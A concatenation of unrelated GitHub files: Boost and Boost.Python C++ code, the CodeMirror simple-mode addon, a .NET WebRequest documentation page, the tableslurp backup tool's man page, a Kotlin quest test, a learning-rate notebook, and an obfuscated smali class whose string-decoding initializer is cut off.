catch( boost::exception & x ) { if( int const * d=boost::get_error_info<test>(x) ) BOOST_TEST( 42==*d ); else BOOST_TEST(false); } catch( ... ) { BOOST_TEST(false); } } try { throw_unknown_exception(); } catch( ... ) { boost::exception_ptr ep=boost::current_exception(); try { rethrow_exception(ep); } catch( boost::unknown_exception & ) { } catch( std::exception & ) { //Yay! Non-intrusive cloning supported! } catch( ... ) { BOOST_TEST(false); } try { rethrow_exception(ep); } catch( boost::exception & ) { } catch( std::exception & ) { //Yay! Non-intrusive cloning supported! } catch( ... ) { BOOST_TEST(false); } } return boost::report_errors(); }
{ "pile_set_name": "Github" }
// CodeMirror, copyright (c) by Marijn Haverbeke and others // Distributed under an MIT license: http://codemirror.net/LICENSE (function(mod) { if (typeof exports == "object" && typeof module == "object") // CommonJS mod(require("../../lib/codemirror")); else if (typeof define == "function" && define.amd) // AMD define(["../../lib/codemirror"], mod); else // Plain browser env mod(CodeMirror); })(function(CodeMirror) { "use strict"; CodeMirror.defineSimpleMode = function(name, states) { CodeMirror.defineMode(name, function(config) { return CodeMirror.simpleMode(config, states); }); }; CodeMirror.simpleMode = function(config, states) { ensureState(states, "start"); var states_ = {}, meta = states.meta || {}, hasIndentation = false; for (var state in states) if (state != meta && states.hasOwnProperty(state)) { var list = states_[state] = [], orig = states[state]; for (var i = 0; i < orig.length; i++) { var data = orig[i]; list.push(new Rule(data, states)); if (data.indent || data.dedent) hasIndentation = true; } } var mode = { startState: function() { return {state: "start", pending: null, local: null, localState: null, indent: hasIndentation ? [] : null}; }, copyState: function(state) { var s = {state: state.state, pending: state.pending, local: state.local, localState: null, indent: state.indent && state.indent.slice(0)}; if (state.localState) s.localState = CodeMirror.copyState(state.local.mode, state.localState); if (state.stack) s.stack = state.stack.slice(0); for (var pers = state.persistentStates; pers; pers = pers.next) s.persistentStates = {mode: pers.mode, spec: pers.spec, state: pers.state == state.localState ? 
s.localState : CodeMirror.copyState(pers.mode, pers.state), next: s.persistentStates}; return s; }, token: tokenFunction(states_, config), innerMode: function(state) { return state.local && {mode: state.local.mode, state: state.localState}; }, indent: indentFunction(states_, meta) }; if (meta) for (var prop in meta) if (meta.hasOwnProperty(prop)) mode[prop] = meta[prop]; return mode; }; function ensureState(states, name) { if (!states.hasOwnProperty(name)) throw new Error("Undefined state " + name + "in simple mode"); } function toRegex(val, caret) { if (!val) return /(?:)/; var flags = ""; if (val instanceof RegExp) { if (val.ignoreCase) flags = "i"; val = val.source; } else { val = String(val); } return new RegExp((caret === false ? "" : "^") + "(?:" + val + ")", flags); } function asToken(val) { if (!val) return null; if (typeof val == "string") return val.replace(/\./g, " "); var result = []; for (var i = 0; i < val.length; i++) result.push(val[i] && val[i].replace(/\./g, " ")); return result; } function Rule(data, states) { if (data.next || data.push) ensureState(states, data.next || data.push); this.regex = toRegex(data.regex); this.token = asToken(data.token); this.data = data; } function tokenFunction(states, config) { return function(stream, state) { if (state.pending) { var pend = state.pending.shift(); if (state.pending.length == 0) state.pending = null; stream.pos += pend.text.length; return pend.token; } if (state.local) { if (state.local.end && stream.match(state.local.end)) { var tok = state.local.endToken || null; state.local = state.localState = null; return tok; } else { var tok = state.local.mode.token(stream, state.localState), m; if (state.local.endScan && (m = state.local.endScan.exec(stream.current()))) stream.pos = stream.start + m.index; return tok; } } var curState = states[state.state]; for (var i = 0; i < curState.length; i++) { var rule = curState[i]; var matches = (!rule.data.sol || stream.sol()) && stream.match(rule.regex); if 
(matches) { if (rule.data.next) { state.state = rule.data.next; } else if (rule.data.push) { (state.stack || (state.stack = [])).push(state.state); state.state = rule.data.push; } else if (rule.data.pop && state.stack && state.stack.length) { state.state = state.stack.pop(); } if (rule.data.mode) enterLocalMode(config, state, rule.data.mode, rule.token); if (rule.data.indent) state.indent.push(stream.indentation() + config.indentUnit); if (rule.data.dedent) state.indent.pop(); if (matches.length > 2) { state.pending = []; for (var j = 2; j < matches.length; j++) if (matches[j]) state.pending.push({text: matches[j], token: rule.token[j - 1]}); stream.backUp(matches[0].length - (matches[1] ? matches[1].length : 0)); return rule.token[0]; } else if (rule.token && rule.token.join) { return rule.token[0]; } else { return rule.token; } } } stream.next(); return null; }; } function cmp(a, b) { if (a === b) return true; if (!a || typeof a != "object" || !b || typeof b != "object") return false; var props = 0; for (var prop in a) if (a.hasOwnProperty(prop)) { if (!b.hasOwnProperty(prop) || !cmp(a[prop], b[prop])) return false; props++; } for (var prop in b) if (b.hasOwnProperty(prop)) props--; return props == 0; } function enterLocalMode(config, state, spec, token) { var pers; if (spec.persistent) for (var p = state.persistentStates; p && !pers; p = p.next) if (spec.spec ? cmp(spec.spec, p.spec) : spec.mode == p.mode) pers = p; var mode = pers ? pers.mode : spec.mode || CodeMirror.getMode(config, spec.spec); var lState = pers ? pers.state : CodeMirror.startState(mode); if (spec.persistent && !pers) state.persistentStates = {mode: mode, spec: spec.spec, state: lState, next: state.persistentStates}; state.localState = lState; state.local = {mode: mode, end: spec.end && toRegex(spec.end), endScan: spec.end && spec.forceEnd !== false && toRegex(spec.end, false), endToken: token && token.join ? 
token[token.length - 1] : token}; } function indexOf(val, arr) { for (var i = 0; i < arr.length; i++) if (arr[i] === val) return true; } function indentFunction(states, meta) { return function(state, textAfter, line) { if (state.local && state.local.mode.indent) return state.local.mode.indent(state.localState, textAfter, line); if (state.indent == null || state.local || meta.dontIndentStates && indexOf(state.state, meta.dontIndentStates) > -1) return CodeMirror.Pass; var pos = state.indent.length - 1, rules = states[state.state]; scan: for (;;) { for (var i = 0; i < rules.length; i++) { var rule = rules[i]; if (rule.data.dedent && rule.data.dedentIfLineStart !== false) { var m = rule.regex.exec(textAfter); if (m && m[0]) { pos--; if (rule.next || rule.push) rules = states[rule.next || rule.push]; textAfter = textAfter.slice(m[0].length); continue scan; } } } break; } return pos < 0 ? 0 : state.indent[pos]; }; } });
{ "pile_set_name": "Github" }
--- title: "Deriving from WebRequest" ms.date: "03/30/2017" helpviewer_keywords: - "WebRequest class, pluggable protocols" - "protocol-specific request handler" - "sending data, pluggable protocols" - "pluggable protocols, class criteria" - "Internet, pluggable protocols" - "receiving data, pluggable protocols" - "protocols, pluggable" ms.assetid: 9810c177-973e-43d7-823c-14960bd625ea --- # Deriving from WebRequest The <xref:System.Net.WebRequest> class is an abstract base class that provides the basic methods and properties for creating a protocol-specific request handler that fits the .NET Framework pluggable protocol model. Applications that use the **WebRequest** class can request data using any supported protocol without needing to specify the protocol used. Two criteria must be met in order for a protocol-specific class to be used as a pluggable protocol: The class must implement the <xref:System.Net.IWebRequestCreate> interface, and it must register with the <xref:System.Net.WebRequest.RegisterPrefix%2A?displayProperty=nameWithType> method. The class must override all the abstract methods and properties of **WebRequest** to provide the pluggable interface. **WebRequest** instances are intended for one-time use; if you want to make another request, create a new **WebRequest**. **WebRequest** supports the <xref:System.Runtime.Serialization.ISerializable> interface to enable developers to serialize a template **WebRequest** and then reconstruct the template for additional requests. ## IWebRequest Create Method The <xref:System.Net.IWebRequestCreate.Create%2A> method is responsible for initializing a new instance of the protocol-specific class. When a new **WebRequest** is created, the <xref:System.Net.WebRequest.Create%2A?displayProperty=nameWithType> method matches the requested URI with the URI prefixes registered with the **RegisterPrefix** method. 
The **Create** method of the proper protocol-specific descendant must return an initialized instance of the descendant capable of performing a standard request/response transaction for the protocol without needing any protocol-specific fields modified. ## ConnectionGroupName Property The <xref:System.Net.WebRequest.ConnectionGroupName%2A> property is used to name a group of connections to a resource so that multiple requests can be made over a single connection. To implement connection-sharing, you must use a protocol-specific method of pooling and assigning connections. For example, the provided <xref:System.Net.ServicePointManager> class implements connection sharing for the <xref:System.Net.HttpWebRequest> class. The **ServicePointManager** class creates a <xref:System.Net.ServicePoint> that provides a connection to a specific server for each connection group. ## ContentLength Property The <xref:System.Net.WebRequest.ContentLength%2A> property specifies the number of bytes of data that will be sent to the server when uploading data. Typically the <xref:System.Net.WebRequest.Method%2A> property must be set to indicate that an upload is taking place when the **ContentLength** property is set to a value greater than zero. ## ContentType Property The <xref:System.Net.WebRequest.ContentType%2A> property provides any special information that your protocol requires you to send to the server to identify the type of content that you are sending. Typically this is the MIME content type of any data uploaded. ## Credentials Property The <xref:System.Net.WebRequest.Credentials%2A> property contains information needed to authenticate the request with the server. You must implement the details of the authentication process for your protocol. The <xref:System.Net.AuthenticationManager> class is responsible for authenticating requests and providing an authentication token. 
The class that provides the credentials used by your protocol must implement the <xref:System.Net.ICredentials> interface. ## Headers Property The <xref:System.Net.WebRequest.Headers%2A> property contains an arbitrary collection of name/value pairs of metadata associated with the request. Any metadata needed by the protocol that can be expressed as a name/value pair can be included in the **Headers** property. Typically this information must be set before calling the <xref:System.Net.WebRequest.GetRequestStream%2A> or <xref:System.Net.WebRequest.GetResponse%2A> methods; once the request has been made, the metadata is considered read-only. You are not required to use the **Headers** property to use header metadata. Protocol-specific metadata can be exposed as properties; for example, the <xref:System.Net.HttpWebRequest.UserAgent%2A?displayProperty=nameWithType> property exposes the **User-Agent** HTTP header. When you expose header metadata as a property, you should not allow the same property to be set using the **Headers** property. ## Method Property The <xref:System.Net.WebRequest.Method%2A> property contains the verb or action that the request is asking the server to perform. The default for the **Method** property must enable a standard request/response action without requiring any protocol-specific properties to be set. For example, the <xref:System.Net.HttpWebResponse.Method%2A> method defaults to GET, which requests a resource from a Web server and returns the response. Typically the **ContentLength** property must be set to a value greater than zero when the **Method** property is set to a verb or action that indicates that an upload is taking place. ## PreAuthenticate Property Applications set the <xref:System.Net.WebRequest.PreAuthenticate%2A> property to indicate that authentication information should be sent with the initial request rather than waiting for an authentication challenge. 
The **PreAuthenticate** property is only meaningful if the protocol supports authentication credentials sent with the initial request. ## Proxy Property The <xref:System.Net.WebRequest.Proxy%2A> property contains an <xref:System.Net.IWebProxy> interface that is used to access the requested resource. The **Proxy** property is meaningful only if your protocol supports proxied requests. You must set the default proxy if one is required by your protocol. In some environments, such as behind a corporate firewall, your protocol might be required to use a proxy. In that case, you must implement the **IWebProxy** interface to create a proxy class that will work for your protocol. ## RequestUri Property The <xref:System.Net.WebRequest.RequestUri%2A> property contains the URI that was passed to the **WebRequest.Create** method. It is read-only and cannot be changed once the **WebRequest** has been created. If your protocol supports redirection, the response can come from a resource identified by a different URI. If you need to provide access to the URI that responded, you must provide an additional property containing that URI. ## Timeout Property The <xref:System.Net.WebRequest.Timeout%2A> property contains the length of time, in milliseconds, to wait before the request times out and throws an exception. **Timeout** applies only to synchronous requests made with the <xref:System.Net.WebRequest.GetResponse%2A> method; asynchronous requests must use the <xref:System.Net.WebRequest.Abort%2A> method to cancel a pending request. Setting the **Timeout** property is meaningful only if the protocol-specific class implements a time-out process. ## Abort Method The <xref:System.Net.WebRequest.Abort%2A> method cancels a pending asynchronous request to a server. 
After the request has been canceled, calling **GetResponse**, **BeginGetResponse**, **EndGetResponse**, **GetRequestStream**, **BeginGetRequestStream**, or **EndGetRequestStream** will throw a <xref:System.Net.WebException> with the <xref:System.Net.WebException.Status%2A> property set to <xref:System.Net.WebExceptionStatus>. ## BeginGetRequestStream and EndGetRequestStream Methods The <xref:System.Net.WebRequest.BeginGetRequestStream%2A> method starts an asynchronous request for the stream that is used to upload data to the server. The <xref:System.Net.WebRequest.EndGetRequestStream%2A> method completes the asynchronous request and returns the requested stream. These methods implement the **GetRequestStream** method using the standard .NET Framework asynchronous pattern. ## BeginGetResponse and EndGetResponse Methods The <xref:System.Net.WebRequest.BeginGetResponse%2A> method starts an asynchronous request to a server. The <xref:System.Net.WebRequest.EndGetResponse%2A> method completes the asynchronous request and returns the requested response. These methods implement the **GetResponse** method using the standard .NET Framework asynchronous pattern. ## GetRequestStream Method The <xref:System.Net.WebRequest.GetRequestStream%2A> method returns a stream that is used to write data to the requested server. The stream returned should be a write-only stream that does not seek; it is intended as a one-way stream of data that is written to the server. The stream returns false for the <xref:System.IO.Stream.CanRead%2A> and <xref:System.IO.Stream.CanSeek%2A> properties and true for the <xref:System.IO.Stream.CanWrite%2A> property. The **GetRequestStream** method typically opens a connection to the server and, before returning the stream, sends header information that indicates that data is being sent to the server. 
Because **GetRequestStream** begins the request, setting any **Header** properties or the **ContentLength** property is typically not allowed after calling **GetRequestStream**. ## GetResponse Method The <xref:System.Net.WebRequest.GetResponse%2A> method returns a protocol-specific descendant of the <xref:System.Net.WebResponse> class that represents the response from the server. Unless the request has already been initiated by the **GetRequestStream** method, the **GetResponse** method creates a connection to the resource identified by **RequestUri**, sends header information indicating the type of request being made, and then receives the response from the resource. Once the **GetResponse** method is called, all properties should be considered read-only. **WebRequest** instances are intended for one-time use; if you want to make another request, you should create a new **WebRequest**. The **GetResponse** method is responsible for creating an appropriate **WebResponse** descendant to contain the incoming response. ## See also - <xref:System.Net.WebRequest> - <xref:System.Net.HttpWebRequest> - <xref:System.Net.FileWebRequest> - [Programming Pluggable Protocols](programming-pluggable-protocols.md) - [Deriving from WebResponse](deriving-from-webresponse.md)
{ "pile_set_name": "Github" }
class TransactionMetric < Prosperity::Metric scope { Transaction } group_by :date aggregate { sum(:amount_in_cents) } end
{ "pile_set_name": "Github" }
.\" Process this file with .\" groff -man -Tascii tableslurp.1 .\" .TH TABLESLURP 1 "August 2015" .SH NAME tableslurp \- cassandra backup utility .SH SYNOPSIS .B tableslurp [-hp] [-k .I AWS_KEY .B ] [-s .I AWS_SECRET .B ] [--token .I AWS_TOKEN .B ] [-o .I OWNER .B ] [-g .I GROUP .B ] [-t .I THREADS .B ] [-f .I FILE .B ] [--force] [-n .I NAME .B ] .I bucket origin target .SH DESCRIPTION .B tableslurp This is the companion script to the .I tablesnap(1) program which you can use to restore files from an Amazon S3 bucket to a local directory which you have write permissions on. While the code is straightforward, the program assumes the files you are restoring were previously backed up with .I tablesnap(1) .SH OPTIONS .IP "-k, --aws-key=AWS_KEY" Amazon S3 Key (defaults to .B AWS_ACCESS_KEY_ID in environment) .IP "-s, --aws-secret=AWS_SECRET" Amazon S3 Secret (defaults to .B AWS_SECRET_ACCESS_KEY in environment) .IP "--token=AWS_SECURITY_TOKEN" Amazon S3 Token (defaults to .B AWS_SECURITY_TOKEN in environment) .IP "-p, --preserve" preserve permissions (if they exist) from the source. 
This overrides -o and -g .IP "-o OWNER, --owner=OWNER" after download, chown files to this user .IP "-g GROUP, --group=GROUP" after download, chgrp files to this group .IP "-t THREADS, --threads=THREADS" split the download between this many threads (default 4) .IP "-f FILE, --file=FILE" if specified, will download the fileset this file belongs to instead of the latest one available .IP "--force" force download of files even if they already exist locally .IP "-n NAME, --name=NAME" use this name instead of the FQDN to prefix the bucket directory .SH ENVIRONMENT .IP AWS_ACCESS_KEY_ID Amazon access key to be used if .B --aws-key is not specified .IP AWS_SECRET_ACCESS_KEY Amazon secret key to be used if .B --aws-secret is not specified .IP AWS_SECURITY_TOKEN Amazon security token to be used if .B --aws-token is not specified .IP TDEBUG If set, logs are emitted at the .I DEBUG level (default INFO) .IP USER Used to determine the default uid/gid to chown files after download .SH DIAGNOSTICS The following diagnostics may be issued on stderr: Could not parse stat metadata for .I filename .RS The JSON object downloaded from the bucket's "stat" key did not contain valid JSON .RE Cannot find anything to restore from .I PATH .RS No -listdir.json files were found in the bucket with the specified prefix and name. .RE Incomplete stat metadata for .I PATH will ignore .RS The JSON object downloaded from the bucket's "stat" key did not contain user and group keys. .RE Failed to download .I filename retrying .RS The S3 download failed, it will be retried up to 5 times. .SH BUGS Please report all bugs to the maintainers at https://github.com/JeremyGrosser/tablesnap/issues .SH AUTHORS Jeremy Grosser <[email protected]> Jorge A Gallegos <[email protected]> .SH "SEE ALSO" .BR tablechop (1), .BR tablesnap (1)
{ "pile_set_name": "Github" }
id: dsq-747515910 date: 2006-07-26T00:09:00.0000000-07:00 name: Dave Burke avatar: https://disqus.com/api/users/avatars/Dave Burke.jpg message: <p>Hey, Phil! We'll see about the future of "Code Available." I only know that the term "Open Source" doesn't seem to generate much harmonious dialog and agreement. :-)<br></p>
{ "pile_set_name": "Github" }
#include "../Base/Node.h" #include "PointLight.h" namespace tzw { class SpotLight : public PointLight { public: SpotLight(); vec3 dir() const; void setDir(const vec3 &dir); void tick(float dt); private: vec3 m_dir; }; } // namespace tzw
{ "pile_set_name": "Github" }
// Copyright David Abrahams 2001. // Distributed under the Boost Software License, Version 1.0. (See // accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) #ifndef CLASS_WRAPPER_DWA20011221_HPP # define CLASS_WRAPPER_DWA20011221_HPP # include <boost/python/to_python_converter.hpp> #ifndef BOOST_PYTHON_NO_PY_SIGNATURES # include <boost/python/converter/pytype_function.hpp> #endif # include <boost/ref.hpp> namespace boost { namespace python { namespace objects { // // These two classes adapt the static execute function of a class // MakeInstance execute() function returning a new PyObject* // reference. The first one is used for class copy constructors, and // the second one is used to handle smart pointers. // template <class Src, class MakeInstance> struct class_cref_wrapper : to_python_converter<Src,class_cref_wrapper<Src,MakeInstance> ,true> { static PyObject* convert(Src const& x) { return MakeInstance::execute(boost::ref(x)); } #ifndef BOOST_PYTHON_NO_PY_SIGNATURES static PyTypeObject const *get_pytype() { return converter::registered_pytype_direct<Src>::get_pytype(); } #endif }; template <class Src, class MakeInstance> struct class_value_wrapper : to_python_converter<Src,class_value_wrapper<Src,MakeInstance> ,true> { static PyObject* convert(Src x) { return MakeInstance::execute(x); } #ifndef BOOST_PYTHON_NO_PY_SIGNATURES static PyTypeObject const *get_pytype() { return MakeInstance::get_pytype(); } #endif }; }}} // namespace boost::python::objects #endif // CLASS_WRAPPER_DWA20011221_HPP
{ "pile_set_name": "Github" }
About ----- This allows verovio to be built as a native library for Android. It does not include any Java bindings. Build instructions ------------------ As a prerequisite you have to install the Android NDK. ``` export ANDROID_NDK_ROOT="/opt/Android/android-ndk-r21b" # adjust to NDK install ANDROID_NDK ndk_build=$ANDROID_NDK_ROOT/ndk-build cd jni $ndk_build ```
{ "pile_set_name": "Github" }
package de.westnordost.streetcomplete.quests import de.westnordost.streetcomplete.data.osm.changes.StringMapEntryAdd import de.westnordost.streetcomplete.data.osm.changes.StringMapEntryModify import de.westnordost.streetcomplete.mock import de.westnordost.streetcomplete.quests.max_speed.* import org.junit.Test class AddMaxSpeedTest { private val questType = AddMaxSpeed(mock()) @Test fun `apply no sign answer`() { questType.verifyAnswer( ImplicitMaxSpeed("XX", "flubberway"), StringMapEntryAdd("maxspeed:type", "XX:flubberway") ) } @Test fun `apply sign answer`() { questType.verifyAnswer( MaxSpeedSign(Kmh(123)), StringMapEntryAdd("maxspeed", "123"), StringMapEntryAdd("maxspeed:type", "sign") ) } @Test fun `apply mph sign answer`() { questType.verifyAnswer( MaxSpeedSign(Mph(123)), StringMapEntryAdd("maxspeed", "123 mph"), StringMapEntryAdd("maxspeed:type", "sign") ) } @Test fun `apply advisory sign answer`() { questType.verifyAnswer( AdvisorySpeedSign(Kmh(123)), StringMapEntryAdd("maxspeed:advisory", "123"), StringMapEntryAdd("maxspeed:type:advisory", "sign") ) } @Test fun `apply zone sign answer`() { questType.verifyAnswer( MaxSpeedZone(Kmh(123), "AA", "zoneXYZ"), StringMapEntryAdd("maxspeed", "123"), StringMapEntryAdd("maxspeed:type", "AA:zoneXYZ") ) } @Test fun `apply living street answer`() { questType.verifyAnswer( mapOf("highway" to "residential"), IsLivingStreet, StringMapEntryModify("highway", "residential", "living_street") ) } }
{ "pile_set_name": "Github" }
{ "cells": [ { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "def get_lr_metric(optimizer):\n", " def lr(y_true, y_pred):\n", " return optimizer.lr\n", " return lr" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "def initial_boost(epoch):\n", " if epoch==0: return float(8.0)\n", " elif epoch==1: return float(4.0)\n", " elif epoch==2: return float(2.0)\n", " elif epoch==3: return float(1.5)\n", " else: return float(1.0)" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "def step_cyclic(epoch):\n", " try:\n", " l_r, decay = 1.0, 0.0001\n", " if epoch%33==0:multiplier = 10\n", " else:multiplier = 1\n", " rate = float(multiplier * l_r * 1/(1 + decay * epoch))\n", " #print(\"Epoch\",epoch+1,\"- learning_rate\",rate)\n", " return rate\n", " except Exception as e:\n", " print(\"Error in lr_schedule:\",str(e))\n", " return float(1.0)" ] } ], "metadata": { "kernelspec": { "display_name": "Python 3", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.6.4" } }, "nbformat": 4, "nbformat_minor": 2 }
{ "pile_set_name": "Github" }
.class public Lcom/m/ac/aa; .super Ljava/lang/Object; # static fields .field public static final aa:Ljava/lang/String; .field public static final ab:Ljava/lang/String; .field public static final ac:Ljava/lang/String; .field public static final ad:Ljava/lang/String; .field public static final ae:Ljava/lang/String; .field public static final af:Ljava/lang/String; .field public static final ag:Ljava/lang/String; .field public static final ah:Ljava/lang/String; .field public static final ai:Ljava/lang/String; .field public static final aj:Ljava/lang/String; .field public static final ak:Ljava/lang/String; .field public static final al:Ljava/lang/String; .field public static final am:Ljava/lang/String; .field public static final an:Ljava/lang/String; .field public static final ao:Ljava/lang/String; .field public static final ap:Ljava/lang/String; .field public static final aq:Ljava/lang/String; .field public static final ar:Ljava/lang/String; .field public static final as:Ljava/lang/String; .field public static final at:Ljava/lang/String; .field public static final au:Ljava/lang/String; .field public static final av:Ljava/lang/String; .field public static final aw:Ljava/lang/String; .field public static final ax:Ljava/lang/String; .field public static final ay:Ljava/lang/String; .field public static final az:Ljava/lang/String; .field public static final ba:Ljava/lang/String; .field public static final bb:Ljava/lang/String; .field public static final bc:Ljava/lang/String; .field public static final bd:Ljava/lang/String; .field public static final be:Ljava/lang/String; .field public static final bf:Ljava/lang/String; .field public static final bg:Ljava/lang/String; .field public static final bh:Ljava/lang/String; .field public static final bi:Ljava/lang/String; .field public static final bj:Ljava/lang/String; .field public static final bk:Ljava/lang/String; .field public static final bl:Ljava/lang/String; .field public static final bm:Ljava/lang/String; .field public 
static final bn:Ljava/lang/String; .field public static final bo:Ljava/lang/String; .field public static final bp:Ljava/lang/String; .field public static final bq:Ljava/lang/String; .field public static final br:Ljava/lang/String; .field public static final bs:Ljava/lang/String; .field public static final bt:Ljava/lang/String; .field public static final bu:Ljava/lang/String; .field public static final bv:Ljava/lang/String; .field public static final bw:Ljava/lang/String; .field public static final bx:Ljava/lang/String; .field public static final by:Ljava/lang/String; .field public static final bz:Ljava/lang/String; .field public static final ca:Ljava/lang/String; .field public static final cb:I .field public static final cc:Ljava/lang/String; .field public static final cd:Ljava/lang/String; .field public static final ce:Ljava/lang/String; .field public static final cf:Ljava/lang/String; .field public static final cg:Ljava/lang/String; .field public static final ch:Ljava/lang/String; .field public static final ci:Ljava/lang/String; .field public static final cj:Ljava/lang/String; .field public static final ck:Ljava/lang/String; .field public static final cl:Ljava/lang/String; .field public static final cm:Ljava/lang/String; # direct methods .method static constructor <clinit>()V .locals 1 sget-object v0, Lcom/m/u/ac;->aa:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aa:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ab:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ab:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ac:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ac:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ad:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ad:Ljava/lang/String; 
sget-object v0, Lcom/m/u/ac;->ae:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ae:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->af:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->af:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ag:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ag:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ah:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ah:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ai:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ai:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->aj:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aj:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ak:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ak:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->al:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->al:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->am:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->am:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->an:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->an:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ao:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ao:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ap:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object 
v0, Lcom/m/ac/aa;->ap:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->aq:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aq:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ar:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ar:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->as:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->as:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->at:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->at:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->au:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->au:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->av:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->av:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ax:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->aw:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ay:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ax:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->az:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ay:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ba:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->az:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bb:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ba:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bj:[B invoke-static {v0}, 
